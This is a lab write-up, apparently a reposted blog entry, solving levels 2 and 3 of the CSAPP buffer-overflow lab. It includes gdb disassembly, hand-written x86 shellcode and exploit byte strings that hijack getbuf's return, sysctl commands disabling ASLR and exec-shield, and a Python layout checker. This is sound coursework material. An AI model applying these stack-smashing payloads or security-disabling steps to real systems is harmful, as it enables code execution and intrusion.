Experimental record of CSAPP buffer overflow (2)

2025-04-06 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Level 2: firecracker (30 points)

bufbomb contains a bang function:

int global_value = 0;

void bang(int val)
{
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}

Similar to the previous two levels, this one requires getbuf to return into bang and, before that, set the global variable global_value to your own cookie.

From this level on, executable shellcode has to be placed in buf on the stack. Experiments showed that the stack on Ubuntu 12.04.5 is not executable (can somebody tell me why?). Since there was no way to turn that off there, Fedora 7 was installed in a virtual machine, the non-executable stack and address randomization were disabled as follows, and the experiment continued.

sysctl -w kernel.randomize_va_space=0

sysctl -w kernel.exec-shield=0

Disassembling bang in gdb gives the entry address of bang, 0x804898c, and the address at which the global variable global_value is stored, 0x804aa60.

[root@localhost buflab]# gdb -q ./bufbomb
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disass bang
Dump of assembler code for function bang:
0x0804898c:    mov    0x804aa60,%eax        ; load global_value into %eax
0x08048991:    push   %ebp
0x08048992:    mov    %esp,%ebp
0x08048994:    sub    $0x8,%esp
0x08048997:    cmp    0x804aa50,%eax        ; compare cookie with global_value
0x0804899d:    jne    0x80489c0
0x0804899f:    add    $0xfffffff8,%esp
0x080489a2:    push   %eax
0x080489a3:    push   $0x80493e0
0x080489a8:    call   0x8048748
0x080489ad:    add    $0xfffffff4,%esp
0x080489b0:    push   $0x2
0x080489b2:    call   0x8048c30
0x080489b7:    add    $0x20,%esp
0x080489ba:    jmp    0x80489d1
0x080489bc:    lea    0x0(%esi),%esi
0x080489c0:    add    $0xfffffff8,%esp
0x080489c3:    push   %eax
0x080489c4:    push   $0x8049405
0x080489c9:    call   0x8048748
0x080489ce:    add    $0x10,%esp
0x080489d1:    add    $0xfffffff4,%esp

Next, the shellcode placed in buf must set the global variable and then jump into bang, and the return address of getbuf must be overwritten with the address of buf.

Get the address of buf in the debugger:

(gdb) disass getbuf
Dump of assembler code for function getbuf:
0x08048a44:    push   %ebp
0x08048a45:    mov    %esp,%ebp
0x08048a47:    sub    $0x…,%esp
0x08048a4a:    add    $0xfffffff4,%esp
0x08048a4d:    lea    0xfffffff4(%ebp),%eax        ; buf = %ebp-12
0x08048a50:    push   %eax
0x08048a51:    call   0x8048b50
0x08048a56:    mov    $0x1,%eax
0x08048a5b:    mov    %ebp,%esp
0x08048a5d:    pop    %ebp
0x08048a5e:    ret
End of assembler dump.

Set a breakpoint at 0x08048a50 and run; this shows that buf is at 0xbfffb0bc.

(gdb) b *0x8048a50
Breakpoint 1 at 0x8048a50
(gdb) run -t heen
Starting program: /root/Desktop/buflab/bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
(gdb) p $ebp+0xfffffff4
$2 = (void *) 0xbfffb0bc

Next, write the shellcode.

[root@localhost buflab]# cat exploit3_shellcode.s
    pushl $0x804898c            # entry address of bang
    movl  $0x5573b7cf,%eax
    movl  %eax,0x804aa60        # store the cookie in global_value
    ret
[root@localhost buflab]# gcc -c exploit3_shellcode.s
[root@localhost buflab]# objdump -d exploit3_shellcode.o

exploit3_shellcode.o:     file format elf32-i386

Disassembly of section .text:

00000000:
   0:   68 8c 89 04 08          push   $0x804898c
   5:   b8 cf b7 73 55          mov    $0x5573b7cf,%eax
   a:   a3 60 aa 04 08          mov    %eax,0x804aa60
   f:   c3                      ret

The machine code of the shellcode is 16 bytes, which reaches exactly to the return-address slot: buf starts at %ebp-12, so the saved %ebp occupies the 4 bytes after buf and the return address sits 16 bytes past the start of buf. The exploit string is therefore the shellcode followed by the address of buf.

[root@localhost buflab]# cat exploit3.txt
68 8c 89 04 08 b8 cf b7 73 55 a3 60 aa 04 08 c3 bc b0 ff bf
[root@localhost buflab]# cat exploit3.txt | ./sendstring | ./bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
Type string:Bang!: You set global_value to 0x5573b7cf
NICE JOB!

Level 3: Dynamite (40 points)

This level requires getbuf to return into test without breaking the stack state that test maintains (test checks for stack corruption), and the value returned by the call to getbuf inside test must be your own cookie. The test function is as follows:

void test()
{
    int val;
    volatile int local = 0xdeadbeef;
    val = getbuf();
    /* Check for corrupted stack */
    if (local != 0xdeadbeef) {
        printf("Sabotaged!: the stack has been corrupted\n");
    } else if (val == cookie) {
        printf("Boom!: getbuf returned 0x%x\n", val);
        validate(3);
    } else {
        printf("Dud: getbuf returned 0x%x\n", val);
    }
}

So the shellcode must not disturb the stack state of test, the caller of getbuf: we not only have to return into test, we also have to restore test's saved frame pointer (SFP), that is, the %ebp of test. There are two ways to restore the frame pointer: set it in the shellcode, or place the SFP at the right position in the exploit string. The second method is used here.

Disassemble test to get the normal return address of the call to getbuf.

(gdb) disass test
Dump of assembler code for function test:
0x080489dc:    push   %ebp
0x080489dd:    mov    %esp,%ebp
0x080489df:    sub    $0x…,%esp
0x080489e2:    movl   $0xdeadbeef,0xfffffffc(%ebp)
0x080489e9:    call   0x8048a44
0x080489ee:    mov    %eax,%edx        ; 0x080489ee is the return address of the getbuf call
0x080489f0:    mov    0xfffffffc(%ebp),%eax
0x080489f3:    cmp    $0xdeadbeef,%eax
0x080489f8:    je     0x8048a10
0x080489fa:    add    $0xfffffff4,%esp
0x080489fd:    push   $0x8049440
0x08048a02:    call   0x8048748
0x08048a07:    jmp    0x8048a40
0x08048a09:    lea    0x0(%esi),%esi
0x08048a10:    cmp    0x804aa50,%edx
0x08048a16:    jne    0x8048a32
0x08048a18:    add    $0xfffffff8,%esp
0x08048a1b:    push   %edx
0x08048a1c:    push   $0x804946a
0x08048a21:    call   0x8048748
0x08048a26:    add    $0xfffffff4,%esp
0x08048a29:    push   $0x3
---Type <return> to continue, or q <return> to quit---

A breakpoint at 0x80489df gives the frame pointer of test: 0xbfffb0e8.

(gdb) b *0x80489df
Breakpoint 2 at 0x80489df
(gdb) run -t heen
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/buflab/bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf

Breakpoint 2, 0x080489df in test ()
(gdb) p $ebp
$3 = (void *) 0xbfffb0e8

Write the shellcode and get its machine code:

[root@localhost buflab]# cat exploit4_shellcode.s
    movl $0x5573b7cf,%eax       # set the return value of getbuf to the cookie
    push $0x80489ee             # push the return address of the getbuf call
    ret
[root@localhost buflab]# gcc -c exploit4_shellcode.s
[root@localhost buflab]# objdump -d exploit4_shellcode.o

exploit4_shellcode.o:     file format elf32-i386

Disassembly of section .text:

00000000:
   0:   b8 cf b7 73 55          mov    $0x5573b7cf,%eax
   5:   68 ee 89 04 08          push   $0x80489ee
   a:   c3                      ret

Combining the information above gives the exploit string: 11 bytes of shellcode, one padding byte, the SFP of test, and the address of buf as the return address. The padding byte ff can be any value except the line terminator 0a and the null byte 00.

[root@localhost buflab]# cat exploit4.txt
b8 cf b7 73 55 68 ee 89 04 08 c3 ff e8 b0 ff bf bc b0 ff bf
[root@localhost buflab]# cat exploit4.txt | ./sendstring | ./bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
Type string:Boom!: getbuf returned 0x5573b7cf
NICE JOB!
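The frame geometry behind both exploit strings (Level 2 and Level 3), as an added check that is not part of the original post: buf sits at %ebp-12 in getbuf, so bytes 12..15 of the string land on the saved %ebp and bytes 16..19 on the return address. The script parses the two strings from the page and confirms those fields against the addresses read in gdb (0xbfffb0bc for buf, 0xbfffb0e8 for test's %ebp) and against the byte restriction (no 00 or 0a); the constants are taken from the page, the function names are my own.

```python
# Added example (not from the original post): checks the layout of the two
# exploit strings against the frame geometry the gdb listings give.
import struct

BUF_ADDR = 0xBFFFB0BC   # buf inside getbuf (p $ebp+0xfffffff4 in gdb)
TEST_EBP = 0xBFFFB0E8   # %ebp of test at the breakpoint on 0x80489df
BUF_SIZE = 12           # lea 0xfffffff4(%ebp),%eax: buf starts 12 bytes below %ebp
BAD_BYTES = {0x00, 0x0A}  # bytes that must not appear in the string

# Exploit strings exactly as fed to sendstring on the page.
LEVEL2 = "68 8c 89 04 08 b8 cf b7 73 55 a3 60 aa 04 08 c3 bc b0 ff bf"
LEVEL3 = "b8 cf b7 73 55 68 ee 89 04 08 c3 ff e8 b0 ff bf bc b0 ff bf"


def frame_layout(buf_addr, buf_size=BUF_SIZE):
    """Addresses of buf, the saved %ebp (SFP) and the return-address slot."""
    ebp = buf_addr + buf_size
    return {"buf": buf_addr, "sfp": ebp, "ret": ebp + 4}


def parse_exploit(hexstr, buf_size=BUF_SIZE):
    """Split a sendstring hex line into the three regions it writes on the stack."""
    data = bytes.fromhex(hexstr)          # whitespace between bytes is allowed
    if len(data) != buf_size + 8:
        raise ValueError("expected %d bytes, got %d" % (buf_size + 8, len(data)))
    sfp, ret = struct.unpack("<II", data[buf_size:])   # little-endian, as x86 stores them
    return {"payload": data[:buf_size], "sfp": sfp, "ret": ret}


def check(hexstr, restore_frame):
    """Return the list of layout problems; an empty list means the string fits the page."""
    fields = parse_exploit(hexstr)
    problems = []
    if any(b in BAD_BYTES for b in bytes.fromhex(hexstr)):
        problems.append("contains 00 or 0a, which cannot appear in the string")
    if fields["ret"] != BUF_ADDR:
        problems.append("return address 0x%08x is not buf" % fields["ret"])
    if restore_frame and fields["sfp"] != TEST_EBP:
        problems.append("saved %%ebp 0x%08x would not restore test's frame" % fields["sfp"])
    return problems


if __name__ == "__main__":
    print(frame_layout(BUF_ADDR))
    # Level 2: bang calls exit(), so the saved %ebp clobbered by the 16-byte shellcode never matters.
    print("level 2:", check(LEVEL2, restore_frame=False) or "ok")
    # Level 3: test reads local at %ebp-4 after getbuf returns, so the SFP must be restored.
    print("level 3:", check(LEVEL3, restore_frame=True) or "ok")
```

Running the Level 2 string with restore_frame=True reports the clobbered saved %ebp, which is exactly why that layout would fail the Level 3 stack check.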


© 2024 shulou.com SLNews company. All rights reserved.
